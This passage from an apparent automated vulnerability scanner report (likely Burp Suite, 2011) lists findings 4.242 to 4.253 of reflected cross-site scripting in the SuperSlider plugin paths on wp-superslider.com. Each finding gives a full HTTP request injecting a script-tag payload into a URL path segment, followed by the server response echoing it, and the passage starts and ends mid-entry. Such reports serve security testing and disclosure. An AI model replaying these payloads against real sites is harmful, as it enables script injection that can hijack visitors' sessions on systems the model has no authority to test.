<input type="hidden" name="badpage" value="/site/wp-content/plugins553e1\"><script>alert(1)</script>04e840362be/superslider-show/js/slideshow.js" />
...[SNIP]...

4.242. http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/slideshow.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-show/js/slideshow.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8abcc"><script>alert(1)</script>ee5f31f45bb was submitted in the REST URL parameter 4. This input was echoed as 8abcc\"><script>alert(1)</script>ee5f31f45bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-show8abcc"><script>alert(1)</script>ee5f31f45bb/js/slideshow.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:47 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674568+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674569; expires=Thu, 02-Feb-2012 19:22:49 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-show8abcc\"><script>alert(1)</script>ee5f31f45bb/js/slideshow.js" />
...[SNIP]...

4.243. http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/slideshow.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-show/js/slideshow.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2e98"><script>alert(1)</script>2c612aa2c9c was submitted in the REST URL parameter 5. This input was echoed as f2e98\"><script>alert(1)</script>2c612aa2c9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-show/jsf2e98"><script>alert(1)</script>2c612aa2c9c/slideshow.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:50 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674570+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674571; expires=Thu, 02-Feb-2012 19:22:51 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-show/jsf2e98\"><script>alert(1)</script>2c612aa2c9c/slideshow.js" />
...[SNIP]...

4.244. http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/slideshow.js [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-show/js/slideshow.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e8b9"><script>alert(1)</script>c2af7f63bf8 was submitted in the REST URL parameter 6. This input was echoed as 9e8b9\"><script>alert(1)</script>c2af7f63bf8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-show/js/slideshow.js9e8b9"><script>alert(1)</script>c2af7f63bf8 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:52 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674573+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674573; expires=Thu, 02-Feb-2012 19:22:53 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:53 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-show/js/slideshow.js9e8b9\"><script>alert(1)</script>c2af7f63bf8" />
...[SNIP]...

4.245. http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/slimbox.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-show/js/slimbox.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa93b"><script>alert(1)</script>da1c1d240d4 was submitted in the REST URL parameter 1. This input was echoed as fa93b\"><script>alert(1)</script>da1c1d240d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitefa93b"><script>alert(1)</script>da1c1d240d4/wp-content/plugins/superslider-show/js/slimbox.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:54 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674574+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674575; expires=Thu, 02-Feb-2012 19:22:55 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:55 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/sitefa93b\"><script>alert(1)</script>da1c1d240d4/wp-content/plugins/superslider-show/js/slimbox.js" />
...[SNIP]...

4.246. http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/slimbox.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-show/js/slimbox.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 902a8"><script>alert(1)</script>5782793370 was submitted in the REST URL parameter 2. This input was echoed as 902a8\"><script>alert(1)</script>5782793370 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content902a8"><script>alert(1)</script>5782793370/plugins/superslider-show/js/slimbox.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:58 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674578+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674578; expires=Thu, 02-Feb-2012 19:22:58 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:58 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content902a8\"><script>alert(1)</script>5782793370/plugins/superslider-show/js/slimbox.js" />
...[SNIP]...

4.247. http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/slimbox.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-show/js/slimbox.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd602"><script>alert(1)</script>efee82710e was submitted in the REST URL parameter 3. This input was echoed as cd602\"><script>alert(1)</script>efee82710e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/pluginscd602"><script>alert(1)</script>efee82710e/superslider-show/js/slimbox.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:59 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674579+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674580; expires=Thu, 02-Feb-2012 19:23:00 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:00 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/pluginscd602\"><script>alert(1)</script>efee82710e/superslider-show/js/slimbox.js" />
...[SNIP]...

4.248. http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/slimbox.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-show/js/slimbox.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32cfb"><script>alert(1)</script>2790aaf3378 was submitted in the REST URL parameter 4. This input was echoed as 32cfb\"><script>alert(1)</script>2790aaf3378 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-show32cfb"><script>alert(1)</script>2790aaf3378/js/slimbox.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:01 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674581+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674581; expires=Thu, 02-Feb-2012 19:23:01 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:01 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-show32cfb\"><script>alert(1)</script>2790aaf3378/js/slimbox.js" />
...[SNIP]...

4.249. http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/slimbox.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-show/js/slimbox.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e12e6"><script>alert(1)</script>f6e7648297d was submitted in the REST URL parameter 5. This input was echoed as e12e6\"><script>alert(1)</script>f6e7648297d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-show/jse12e6"><script>alert(1)</script>f6e7648297d/slimbox.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:03 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674583+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674583; expires=Thu, 02-Feb-2012 19:23:03 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-show/jse12e6\"><script>alert(1)</script>f6e7648297d/slimbox.js" />
...[SNIP]...

4.250. http://wp-superslider.com/site/wp-content/plugins/superslider-show/js/slimbox.js [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-show/js/slimbox.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59b1e"><script>alert(1)</script>7e580d589db was submitted in the REST URL parameter 6. This input was echoed as 59b1e\"><script>alert(1)</script>7e580d589db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-show/js/slimbox.js59b1e"><script>alert(1)</script>7e580d589db HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:04 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674584+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674585; expires=Thu, 02-Feb-2012 19:23:05 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:05 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-show/js/slimbox.js59b1e\"><script>alert(1)</script>7e580d589db" />
...[SNIP]...

4.251. http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55536"><script>alert(1)</script>160905c159f was submitted in the REST URL parameter 1. This input was echoed as 55536\"><script>alert(1)</script>160905c159f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site55536"><script>alert(1)</script>160905c159f/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:40 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674560+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674560; expires=Thu, 02-Feb-2012 19:22:40 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site55536\"><script>alert(1)</script>160905c159f/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css" />
...[SNIP]...

4.252. http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aac9e"><script>alert(1)</script>d90ed1acbd5 was submitted in the REST URL parameter 2. This input was echoed as aac9e\"><script>alert(1)</script>d90ed1acbd5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-contentaac9e"><script>alert(1)</script>d90ed1acbd5/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:42 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674562+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674562; expires=Thu, 02-Feb-2012 19:22:42 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-contentaac9e\"><script>alert(1)</script>d90ed1acbd5/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css" />
...[SNIP]...

4.253. http://wp-superslider.com/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-show/plugin-data/superslider/ssShow/default/default.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8332"><script>alert(1)</script>7ad48b4bc3b was submitted in the REST URL parameter 3. This input was echoed as a8332\"><script>alert(1)</script>7ad48b4bc3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/pluginsa8332"><script>alert(1)</script>7ad48b4bc3b/superslider-show/plugin-data/superslider/ssShow/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:43 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674564+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674564; expires=Thu, 02-Feb-2012 19:22:44 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443

